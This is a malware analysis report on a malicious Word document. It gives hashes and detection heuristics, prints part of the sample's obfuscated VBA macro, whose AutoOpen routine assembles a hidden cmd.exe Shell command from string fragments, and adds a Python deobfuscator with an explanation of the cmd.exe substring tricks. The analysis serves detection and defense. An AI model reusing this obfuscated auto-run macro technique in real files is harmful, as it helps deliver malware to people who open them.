Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 057fcc05bfcbb356…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 174.5 KB
Created: 2018-07-27 15:21:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: c2a51280f3d4cb11cd1b97c3bb74018a
SHA-1: 8b2acbc4038504f37b50b7787de489c4b2b3486d
SHA-256: 057fcc05bfcbb356e8d4b5f23a6e1379079d77126d16400b8e2b3d2b5fc7175b
Risk Score: 142

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6774284-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6774284-0
  • VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code; the decoded source is listed under Extracted artifacts.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    The VBA project defines Sub AutoOpen(), which Word runs automatically when the document is opened with macros enabled. In this sample AutoOpen calls Shell with a command line assembled from string fragments returned by helper functions (see the extracted macro below).
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    Rule text: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and the rule is meant to fire when no modern VBA project is recovered and no stronger macro-virus family marker is present. It is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas, below), so here the marker is redundant with OLE_VBA_AUTOOPEN rather than evidence of a WordBasic-only document.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the XML namespace URI of OOXML DrawingML, present in any Word document that contains a shape or picture. It is a schema identifier, not a destination the macro contacts, and should not be treated as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  33323 bytes
SHA-256: edc382e5e15ac09ea9faeea62ef12c9b991dd4d4019c71b337425918146dbca9

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZnRndqwqqYSRnq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   tZHus = Sqr(YBivcF)
   XNrloL = CDbl(2)
   WzCzw = 398247479
   wlhaNK = mBsVlE
Shell@ CVar("cm") + zLRMaWvC + UwjttYkzn + bCnAOZ + jpDbKI + rcXzSzGEb + ozJKktbIuz + sRAqj + IlSui + WCSFVwDrwaN + dDPuVQrEcEc + wtNvlz + ccqWkwrv + wRSzS + uNOMl + uRIUbqw + dUSvZoltsVV + bMipouTfVd + MiqFH + bEPzBt + uKOPT + MFvqF + MYfvlY + EUhkKcTduFV + foBIYD + fzDVv + FuBURPEoa + rDUFMSiUAsB + zFziwObz + ZilwaEYdAur + zhWFpEuQ + nwoTEi + hncUzmrJ + EnJtuiIHz + XjsAlsZM + UwshJ + vwfPk + biZrABTo + BSkHT + KNEdzLYBp + afuWscl + twUEPCP + YWJiVV + hjPzdFw + bSFIZH + YDsHlXrHfQS + klNLPQaXzKb, 628529634 - 628529634
   FSUGM = Fix(uzjSaO)
   ClvqW = ChrW(THJXV - uPJkp + lrzmN - ljGFGZ)
   UAQnJ = Fix(8)
End Sub


Attribute VB_Name = "KUQXGFnNOBkiE"
Function bCnAOZ()
On Error Resume Next
ipiHU = CStr(joprcN)
iobYRf = "d      " + "         " + "/c" + " " + "     "
aLXnHY = Int(79170 + fkCaLv - 30016 * fHdjwp)
YrGGfflW = "     " + "  " + "  CM%tMp:~" + "-" + "15,1%" + " /V:o"
iuVwjjhhS = "N /R   " + CStr(Chr(VLImAPJU + wQUBKvatSzPDi + 34 + nunEGqSMKcGE + DLuvVNnzP)) + "  SE" + "T " + "  " + "'?="
UbCvp = "-__///" + "\_" + "/\-\_\- \/" + "-/_-\_-/" + "\__\- " + "-/\_\-//_" + "\\/_-"
bCnAOZ = iobYRf + YrGGfflW + iuVwjjhhS + UbCvp
   ctMzWR = Sqr(162)
   LzqBH = Oct(kFLowB)
End Function
Function jpDbKI()
On Error Resume Next
UdCajd = "_ \\" + "_" + "\-"
LjRvYz = Sin(YuRVAH)
   aMzFjT = Atn(2)
fphwFGh = "/-__\/-_-" + "/ \_-\-_/" + "__-/-\/\ " + "-__"
fdkvKzIfHk = "\" + "\--\/\" + "/__/- \-_" + "_/_\"
PnGQp = Sqr(kBmcC + SGiEuk / bzlXlI * qYjjwu)
   hAmlq = Sqr(3)
oZMoqZ = "/\" + "\"
RcKWw = "/--/_ _-" + "-" + "\_\_//-/\-" + "\/ -/-"
dklkQfk = "\\/_/\__-" + "\-" + "_ ///_\-\-" + "__\" + "/\-- -" + "/-_/\_"
jpDbKI = UdCajd + fphwFGh + fdkvKzIfHk + oZMoqZ + RcKWw + dklkQfk
   HSimN = CDbl(63)
End Function
Function rcXzSzGEb()
On Error Resume Next
qzKudLH = "/\_-" + "/_\- " + "\__-/" + "_-\\\--"
QjnHcpdYtbG = "/_/ \_/_-" + "/\_/---/" + "_\" + " _\/" + "-\_\-/-/"
ujSWF = "_/\_ __/" + "-_\/\" + "-/\/--\ _" + "-\\__\-/-/" + "//_" + "- /\/-" + "__/-"
YEiKzC = CInt(rBPCXd)
GCmlapm = "--" + "/\\_\ _/" + "--/\" + "__/-_/\\-" + "}/_\_--/" + "/" + "_"
FGEWl = 218523583
   GTLRF = Sin(7)
DdHQfsdPwVf = "\" + "-/\-\}" + "_-\//-"
rVmov = Round(59847 / oYqwbj)
   QjCwh = Hex(9124)
   wdswYE = 9038
CHztskittza = "-\" + "-/\/_" + "\_{_\//\--"
ncicq = 70
   jDCln = 9759562
OnlZwIuSvd = "_//\" + "-\-_h_//-" + "\-\" + "/\-___\-c" + "\\-//"
SITMIT = Rnd(nPAYwm)
   daRjfn = CInt(69294 + SRkYF - FTvpbI + cuAwYL)
   DCMCW = 39
qwknprtiTps = "//\_-___\"
JkJpuXl = "-t\/" + "/\-_" + "\-" + "--/\_"
EIsAj = 271850306
FRCzjLWpT = "_/a/"
rcXzSzGEb = qzKudLH + QjnHcpdYtbG + ujSWF + GCmlapm + DdHQfsdPwVf + CHztskittza + OnlZwIuSvd + qwknprtiTps + JkJpuXl + FRCzjLWpT
   CMFtaz = CStr(MIcjlH)
   blTAJ = Oct(MzRHj)
End Function
Function ozJKktbIuz()
On Error Resume Next
SSWjt = Fix(LTjKmq)
kimoJBHolA = "\--_" + "-_/\_-" + "/\_/c-_" + "-__-" + "\///\-_" + "\/}-_-\\\_" + "_"
iALBw = HFTpuT
vwITDHAiMa = "_//\/-/" + ";-/\\\\_//" + "_-_/-_" + "k" + "/_"
BBIjw = Hex(JAvGAm)
wdGMq = "-\-__--\/" + "/\/_a\\" + "/___--\/-" + "/\-" + "_e_\\" + "--_\" + "-"
NHdLND = 141952124
   dCjVIk = 51172770
   DzYMB = 22
NBZhfR = "//-" + "_\//r\"
JcNFfJ = "/-_//\__" + "-/-_\" + "\b/\" + "_--_\-/_\-" + "/_/"
idEoBD = ChrB(bFJzdw + oHZVO)
   bkhTLc = CInt(YvEBi)
   aZAPuv = Tan(zpImw)
qFKYImjIEi = ";\//-_/-/\" + "\--\_" + "_S\-_" + "\_/" + "__-/\/\/-D" + "-___\-/\/_"
Dwjiwz = Fix(38475 - SQzwJh / QiILGs / VqbZD)
ZMaizi = "-\\-" + "/" + "f/\-_" + "/\\" + "-_/_\"
vtAwDd = ChrB(komHtO)
PiAQXrvRTU = "_--$/__" + "-/_\\" + "/-/-_\" + "- \--_" + "\\///" + "_-\-_"
KmXVDz = Sgn(dEczT)
   EqNnTa = CDate(vzjaqD)
... (truncated)
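What the preview shows is a concatenation obfuscator: AutoOpen hands Shell a "+" chain of helper Functions, each helper builds its return value (the local of the same name) from short string literals, and the Sqr/Fix/Rnd/Oct lines between them are unused noise. The identifiers inside Chr(VLImAPJU + wQUBKvatSzPDi + 34 + nunEGqSMKcGE + DLuvVNnzP) are never assigned anywhere, so without Option Explicit and under On Error Resume Next they are Empty and the call is Chr(34), a double quote. The visible fragments of bCnAOZ therefore assemble to cmd /c CM%tMp:~-15,1% /V:oN /R " SET '?= followed by the \-_/ junk: %tMp:~-15,1% is cmd.exe substring expansion that picks one character of %TMP% (the D of \AppData\Local\Temp on a default profile), so the token CMD never appears in the macro; /V:ON turns on delayed expansion and /R is accepted by cmd.exe as an undocumented equivalent of /C. The rest of the command is not recoverable from the truncated preview. The script below is an added example for this finding and for the OLE_VBA_AUTOOPEN heuristic above; it is not the page's or the sample's own code. SAMPLE is a constructed, shortened imitation of the preview (not the real macros.bas), and HOST_ENV is an assumed victim environment.

```python
# Added example, not the page's or the sample's code: evaluate the concatenation
# obfuscation used by the macro above and reconstruct the Shell() command line.
import re

# Constructed input in the style of the extracted macro (shortened; not the real one).
SAMPLE = r'''
Sub AutoOpen()
On Error Resume Next
Shell@ CVar("cm") + zLRMaWvC + bCnAOZ + jpDbKI, 628529634 - 628529634
End Sub
Function bCnAOZ()
iobYRf = "d      " + "         " + "/c" + " " + "     "
YrGGfflW = "     " + "  " + "  CM%tMp:~" + "-" + "15,1%" + " /V:o"
iuVwjjhhS = "N /R   " + CStr(Chr(VLImAPJU + 34 + nunEGqSMKcGE)) + "  SE" + "T " + "  " + "'?="
bCnAOZ = iobYRf + YrGGfflW + iuVwjjhhS
End Function
Function jpDbKI()
jpDbKI = "_ \\" + "_" + "\-" + "/\" + "\"
End Function
'''
# Assumed victim environment: a default Windows profile's %TMP% ends in \AppData\Local\Temp.
HOST_ENV = {"TMP": r"C:\Users\victim\AppData\Local\Temp"}
BLOCK_RE = re.compile(r"^(?:Sub|Function)\s+(\w+)\([^)]*\)[^\n]*\n(.*?)^End\s+(?:Sub|Function)", re.M | re.S)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
SHELL_RE = re.compile(r"^\s*Shell@?\s+(.+?)\s*$", re.I)
SUBSTR_RE = re.compile(r"([%!])([^%!:\n]+):~(-?\d+)(?:,(-?\d+))?\1")

def split_top(expr, sep):  # split on sep only outside string literals and parentheses
    parts, depth, in_str = [""], 0, False
    for ch in expr:
        in_str ^= ch == '"'
        depth += (not in_str) * ((ch == "(") - (ch == ")"))
        if ch == sep and depth == 0 and not in_str:
            parts.append("")
        else:
            parts[-1] += ch
    return [p.strip() for p in parts]

class Deobfuscator:
    def __init__(self, vba):
        self.funcs, self.cache = {n.lower(): b for n, b in BLOCK_RE.findall(vba)}, {}

    def evaluate(self, expr, env):
        vals = [self.term(t, env) for t in split_top(expr, "+")]
        if any(isinstance(v, str) for v in vals):       # "+" with a string operand concatenates
            return "".join("" if v is None else str(v) for v in vals)
        return None if all(v is None for v in vals) else sum(v for v in vals if v is not None)

    def term(self, t, env):
        if len(t) >= 2 and t[0] == t[-1] == '"':
            return t[1:-1].replace('""', '"')
        if t.isdigit():
            return int(t)
        if re.fullmatch(r"\w+", t):                     # local, helper Function, or undefined name
            key = t.lower()
            if key in env:
                return env[key]
            if key in self.funcs and key not in self.cache:
                self.cache[key] = None                  # recursion guard
                self.cache[key] = self.run(key)[0].get(key)
            return self.cache.get(key)                  # never defined anywhere: Empty
        m = re.fullmatch(r"(\w+)\((.*)\)", t, re.S)
        fn = m.group(1).lower() if m else ""
        if fn in ("cstr", "cvar"):
            return self.evaluate(m.group(2), env)
        if fn in ("chr", "chrw", "chrb"):               # Chr(Empty + 34 + Empty) is Chr(34)
            n = self.evaluate(m.group(2), env)
            return chr(n) if isinstance(n, int) and 0 <= n < 0x110000 else chr(0)
        return None                                     # Sqr(), Fix(), Rnd()... are noise

    def run(self, name):  # execute one block top to bottom; return locals and Shell arguments
        env, shells = {}, []
        for line in self.funcs[name].splitlines():
            if m := SHELL_RE.match(line):               # first argument is the command line
                shells.append(self.evaluate(split_top(m.group(1), ",")[0], env))
            elif m := ASSIGN_RE.match(line):
                env[m.group(1).lower()] = self.evaluate(m.group(2), env)
        return env, shells

def expand(text, variables):  # cmd.exe %VAR:~start,len% (same rules for !VAR:~...! under /V:ON)
    lookup = {k.lower(): v for k, v in variables.items()}
    def sub(m):
        value = lookup.get(m.group(2).lower())
        if value is None:                               # undefined: cmd leaves the text as typed
            return m.group(0)
        start = int(m.group(3))
        start = max(len(value) + start, 0) if start < 0 else start
        length = len(value) - start if m.group(4) is None else int(m.group(4))
        end = len(value) + length if length < 0 else start + length
        return value[start:end]
    return SUBSTR_RE.sub(sub, text)

def deobfuscate(vba, host_env, entry="AutoOpen"):
    """(raw, expanded) for each Shell call reachable from the entry point."""
    raw = [c for c in Deobfuscator(vba).run(entry.lower())[1] if isinstance(c, str)]
    return [(c, expand(c, host_env)) for c in raw]

if __name__ == "__main__":
    print(*deobfuscate(SAMPLE, HOST_ENV), sep="\n")
```

Against the constructed SAMPLE the evaluator returns the raw string with CM%tMp:~-15,1% still in it and the expanded form with CMD in its place; padding spaces are kept on purpose, because they are part of the value assigned by SET and shift the offsets of any later substring picks. To run it on the real artifact, read macros.bas and pass its text to deobfuscate. The next stage of this family of obfuscation, a SET of a long junk string followed by !name:~N,1! picks under delayed expansion, is handled by the same expand function once the complete SET value is known from the full file; the page's preview is truncated, so that step is not shown here. The evaluator only understands "+" concatenation, CStr/CVar and Chr; other macros would need cases for "&", Replace, StrReverse and similar calls.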